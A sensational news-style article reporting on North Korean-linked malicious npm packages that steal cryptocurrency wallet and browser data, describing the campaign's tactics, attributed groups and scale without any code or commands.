North Korean hackers have released a wave of attacks on the npm ecosystem, uploading multiple malicious packages between August 12-27, 2024. The packages—with names like temp-etherscan-api, ethersscan-api, and telegram-con—are part of the notorious “Contagious Interview” campaign. Classic North Korea. They just can’t help themselves when it comes to stealing crypto.
These aren’t your average script kiddies. The attackers used multi-stage obfuscated JavaScript that downloads additional malware after installation. Smart. Devious. Effective. The malware specifically targets cryptocurrency wallets and browser data, because of course it does—North Korea needs funds, and they’re not exactly swimming in legitimate income sources.
North Korea’s hackers deploy sophisticated JavaScript traps that hunt your crypto like digital bloodhounds. Desperate regimes require desperate measures.
The malicious code is particularly nasty. It systematically extracts sensitive data from crypto wallet extensions, establishes persistence on victim machines, and even comes with a full Python interpreter for extra functionality. It hunts through Chrome, Brave, Firefox, and even digs into the macOS keychain. Nothing is safe. Not your passwords, not your crypto.
Security researchers have linked these attacks to several North Korean threat groups, including Famous Chollima and Moonstone Sleet. The infamous Lazarus Group is likely directing the larger cryptocurrency heists. They’re coordinating their efforts like never before. The North Korean operation known as Stressed Pungsan has been directly tied to these state-backed hacking activities. Additional malicious packages like helmet-validate and qq-console were also identified by Phylum researchers as part of this campaign.
The scale is alarming—over 330 downloads of these malicious packages have been detected. Hundreds of companies have been targeted globally. In February 2025, attackers stole over $1.5 billion from Bybit exchange in what’s likely a related operation. Just let that sink in. $1.5 billion.
These attacks highlight the growing risks in open-source software supply chains. The hackers are using clever tactics—typosquatting popular packages, hiding malicious code in innocent-looking functions, and using eval() to execute remote code. They’re good at cleaning up their tracks, too.
The stakes couldn’t be higher. Developer machines are prime targets. Software supply chains are vulnerable. And North Korea? They’re laughing all the way to their cryptocurrency wallets.
